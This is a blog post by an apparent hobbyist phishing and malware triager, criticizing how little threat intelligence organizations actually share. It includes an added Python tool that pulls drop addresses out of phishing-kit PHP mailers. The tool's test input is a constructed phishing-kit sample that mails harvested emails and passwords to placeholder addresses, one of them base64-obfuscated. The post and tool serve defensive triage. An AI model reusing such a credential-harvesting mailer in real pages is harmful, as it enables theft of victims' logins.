We have....um, tutorials. Oh, and virus and phishing email articles!
"install Weatherbug one more God-damn time, Mike, you'll be running DeepFreeze faster than you can say Ask Toolbar.", thought the IT lady.
You know, I should use this front page for something.
What a month. Who is this BiN badass? How is that even possible?
Netcraft is cool, it gives us a place to put phishing site information, and it is validated very quickly (usually) and shows up on real blocklists in a timely manner.
Another cool group of people is malwarehunterteam.com, and their helpful data feeds at http://cybertracker.malwarehunterteam.com.
One thing that CyberTracker gives a shit about that no one else seems to care about is the phishing-related email addresses that phishing sites send data to. If someone, like maybe the Gmail Team at Google, looked at this list they could use that as a starting point to look at abused/abusive gmail accounts.
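For anyone doing this kind of triage, here is an added example of pulling those drop addresses out of a phishing kit's PHP mailer. This is not code from this site, from CyberTracker or from malwarehunterteam.com; the kit source below is a constructed sample, the addresses in it are placeholders, and the variable names are invented for illustration. It resolves the recipient passed to mail() (literal or variable), undoes the base64_decode() trick kits use to hide an address from casual grepping, and falls back to scanning every string literal.

```python
import base64
import binascii
import re
from typing import Dict, List, Optional

# Constructed sample of a phishing-kit "mailer" (invented for this example; the
# addresses are placeholders). Kits typically glue the harvested POST fields
# into a message and mail() it to one or more drop addresses, sometimes hiding
# an address behind base64_decode() to frustrate casual grep-based triage.
SAMPLE_KIT_PHP = r'''<?php
$ip = getenv("REMOTE_ADDR");
$message .= "Email: ".$_POST['email']."\n";
$message .= "Password: ".$_POST['password']."\n";
$send = "resultz.collector@example.com";
$send2 = base64_decode("ZHJvcC5ib3gyQGV4YW1wbGUubmV0");
$subject = "New Login From $ip";
mail($send, $subject, $message);
mail($send2, $subject, $message);
mail("backup.logs@example.org", $subject, $message);
header("Location: https://www.example.com/");
?>'''

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
# $var = "literal";
ASSIGN_RE = re.compile(r"""\$(\w+)\s*=\s*(['"])(.*?)\2\s*;""")
# $var = base64_decode("....");
B64_ASSIGN_RE = re.compile(
    r"""\$(\w+)\s*=\s*base64_decode\(\s*(['"])([A-Za-z0-9+/=]+)\2\s*\)\s*;"""
)
# First argument of mail() is the recipient.
MAIL_RE = re.compile(r"""\bmail\(\s*([^,]+?)\s*,""")
STRING_RE = re.compile(r"""(['"])(.*?)\1""")


def try_base64(text: str) -> Optional[str]:
    """Return the decoded text if `text` is base64 for printable ASCII, else None."""
    if len(text) % 4 or not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", text):
        return None
    try:
        decoded = base64.b64decode(text, validate=True)
    except (binascii.Error, ValueError):
        return None
    if not decoded.isascii() or not decoded.decode("ascii").isprintable():
        return None
    return decoded.decode("ascii")


def resolve_strings(php_src: str) -> Dict[str, str]:
    """Map simple $variables to string values, resolving base64_decode() wrappers."""
    values: Dict[str, str] = {}
    for name, _quote, literal in ASSIGN_RE.findall(php_src):
        values[name] = literal
    for name, _quote, blob in B64_ASSIGN_RE.findall(php_src):
        decoded = try_base64(blob)
        if decoded is not None:
            values[name] = decoded
    return values


def extract_drop_addresses(php_src: str) -> List[str]:
    """Return the sorted set of email addresses a kit's PHP source sends data to."""
    variables = resolve_strings(php_src)
    found = set()
    # Primary signal: the recipient argument of each mail() call, whether a
    # literal or a variable resolved above.
    for arg in MAIL_RE.findall(php_src):
        arg = arg.strip()
        if arg.startswith("$"):
            candidate = variables.get(arg[1:], "")
        else:
            candidate = arg.strip("'\"")
        found.update(EMAIL_RE.findall(candidate))
    # Secondary signal: any address in any string literal, including literals
    # that only become an address after base64 decoding.
    for _quote, literal in STRING_RE.findall(php_src):
        found.update(EMAIL_RE.findall(literal))
        decoded = try_base64(literal)
        if decoded:
            found.update(EMAIL_RE.findall(decoded))
    return sorted(found)


if __name__ == "__main__":
    for address in extract_drop_addresses(SAMPLE_KIT_PHP):
        print(address)
```

Run it over the unpacked kit (every .php file, not just the one that renders the fake login page) and submit what comes out; the base64 fallback is what catches the address a plain grep for "@" misses.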
Obviously VirusTotal.com is great. The comments section can provide really useful information if someone posts really good info (or not, if the comment is just "#malware" ... we know it's malware dude, why do you think we are all here?)...
So many choices for data sharing! But it seems like there aren't REALLY that many people sharing data. It's mostly the same group of people. If you think how many IT people there are, in commercial and community organizations all over the world, seeing hacked websites, malvertising, phishing, malware, attacks, we should be seeing a lot of shared information.
According to this article from net-security.org called "Most organizations value threat intelligence sharing", you would think that all these organizations REALLY are sharing. But that is bullshit. The same minority of people are reporting 90% of the stuff that is released to the public.
Lately, the Dyreza botnet (s?) has been taking over ISP equipment to use them as proxies for downloads and C2 traffic. You'd think that ISPs, being technically-oriented people, would be willing to share some information when I informed them of their breach... but alas only 3 organizations out of 15 notified even responded, and only 2 shared any info when I asked them to. (One of them actually provided the ELF binaries they found on the hacked device, which I relayed via twitter to everyone else... because sharing.)
That's a whole other problem, why are the ISPs hearing it from me first? No offence to myself, but THL is a low-skill, non-infosec, low-rent side hobby. If most organizations "value intelligence sharing", surely the ISPs would hear it from someone else first. In fact, there is a high-rent infosec rockstar company (who I won't name), who seems like they already knew all about it.... but never bothered to notify any of the ISPs? Or anyone at all outside their own organization.
Most organizations value mouth-service and buzzword-usage, very few actually DO WORK to share any information at all.
Q: But aren't you just a pageview-whoring blogger?
A: I'd say that I am ALSO a pageview-whoring blogger, which is in addition to doing that which takes up most of my allotted hobby time: rapid triage, half-assed intel given quickly to anyone who will listen, for research and blocklist purposes to mitigate damage to Joe Sixpack.
Like in VT comments:
Or any groups who will listen to me or let me submit what I find, like malwarehunterteam.com
While trying to contribute data to a group of real researchers, someone from an infosec-rockstar organization made an oblique comment that certain individuals are likely to publish information for pageview-whoring purposes. The implication is that pageview-whores (perhaps he meant me) are financially incentivized to publish useful information.
While there is truth to this statement, I am incentivized to the tune of about $40 a month (or -$40 a month if I can't make this thing pay for itself).
Contrast that with infosec-rockstar organizations who are financially DIS-incentivized to publish useful information for public consumption. The information is more useful to them if kept in-house. I bet they are looking at a lot more than $40 of incentive.
The rockstar orgs are big-picture people. There's nothing wrong with that. But we need more rapid triage people, busting open malware and posting IPs, URLs, and talking about new behaviors they notice.